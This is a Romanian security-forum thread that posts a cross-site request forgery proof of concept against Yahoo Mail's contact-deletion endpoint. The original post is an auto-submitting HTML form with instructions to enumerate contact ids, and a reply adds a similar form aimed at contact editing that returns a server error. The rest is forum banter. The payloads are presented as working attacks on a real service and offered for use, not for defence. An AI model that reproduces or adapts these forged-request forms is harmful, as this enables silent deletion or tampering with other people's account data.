Jump to content
Pugna

Yahoo! Mail Cross Site Request Forgery

By Pugna, in Exploituri

Recommended Posts

Pugna Newbie

Pugna

Posted
Posted (edited)

# Vulnerability found in- Yahoomail Delete Contact module

# email prakhar.agrawal26@gmail.com

# company AKS IT Services Pvt. Ltd

# Credit by Prakar Agrawal

# Email Service Yahoomail

# Category Mail service

# Site p4ge http://www.yahoomail.com

# Plateform java

# Proof of concept #

Targeted URL: http://address.mail.yahoo.com/

Script to Delete the contacts from contact list through Cross Site request forgery

. ................................................................................................................

<html>
                            <body>
                                  <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
                                  <input type=hidden name="action" value="delete_contacts">
                                  <input type=hidden name="id" value="$Numeric No.$">
                                  </form>
                                  <script>document.csrf.submit();</script>
                            </body>
                        </html>

. ..................................................................................................................

Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working.....

________________________________________________________________________

L-am testat, functioneaza.

Am incercat acelasi lucru si pentru editare, cu modificarile de rigoare:


<html>
<body>
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/EditContact.json?" method="POST">
<input type=hidden name="action" value="edit_contact">
<input type=hidden name="contact_id" value="16777820">
<input type=hidden name="fields[0:1::16778515:1]" value="^[eOo]^[PrInCeSs]^">
<input type=hidden name="fields[0:3::16778515:1]" value="DeeAYYY">
<input type=hidden name="flags[8:::16778516:1]" value="8:::0:0">
<input type=hidden name="fields[8:::16778516:1]" value="sw33t_babygirl_007">
<input type=hidden name="flags[7::3:0:1]" value="7::3:0:0">
<input type=hidden name="flags[7::0:0:1]" value="7::0:0:0">
<input type=hidden name="flags[17:::0:1]" value="17:::0:0">
<input type=hidden name="flags[18:::0:1]" value="18:::0:0">
</form>
<script>document.csrf.submit();</script>
</body>
</html>

Dar primesc un 500 Internal in headere.

Ciudat e ca merge delete-ul. Care mai e utilitatea tokenului _crumb daca avem CSRF ?

Edited by Pugna
eth0 Newbie

eth0

Posted
Posted

Dar primesc un 500 Internal in headere.

Ciudat e ca merge delete-ul. Care mai e utilitatea tokenului _crumb daca avem CSRF ?

pai posteaza la "ajutor" sau la "cereri" daca nu stii exact ce face "presupusul" exploit

Pugna Newbie

Pugna

Posted
  • Author
Posted
pai posteaza la "ajutor" sau la "cereri" daca nu stii exact ce face "presupusul" exploit

Bre, ai citit bine ce am scris ? Daca din postul meu ai tras concluzia ca nu stiu eu cu ce se mananca inseamna ca tu n-ai nicio treaba.

Am mai incercat sa il pacalesc pentru editare, dar n-am reusit, tot 500 primesc. Oricum nu prea are utilitate, tinand cont si de faptul ca id-urile numerice sunt generate.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...